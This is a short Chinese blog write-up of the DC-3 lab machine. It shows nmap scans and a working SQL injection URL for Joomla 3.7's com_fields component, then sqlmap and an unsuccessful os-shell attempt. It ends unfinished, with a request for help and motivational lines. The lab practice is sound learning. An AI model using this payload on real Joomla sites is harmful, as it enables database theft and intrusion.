DC-3靶机学习
1.日常扫描
nmap -sP -PI 192.168.2.0/24 -T4
是134这个地址
nmap -A -p- 192.168.2.134
2.joomla
1)版本扫描
joomla 3.7这个版本有个sql注入漏洞
poc
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
2)漏洞确认
上sqlmap
探测到是dba,试试os-shell
不行,害
跑了下,注射到字段,出不来字段名,有点蒙逼
来个好人救救可怜的博主吧,害
越有故事的人越沉静简单,越肤浅单薄的人越浮躁不安,真正的强者不是没有眼泪的人,而是含着眼泪依然奔跑的人,我们要敢于背上超出自己预料的包袱。努力之后,你会发现,自己要比想象的优秀很多。
坚持梦想,负重前行。
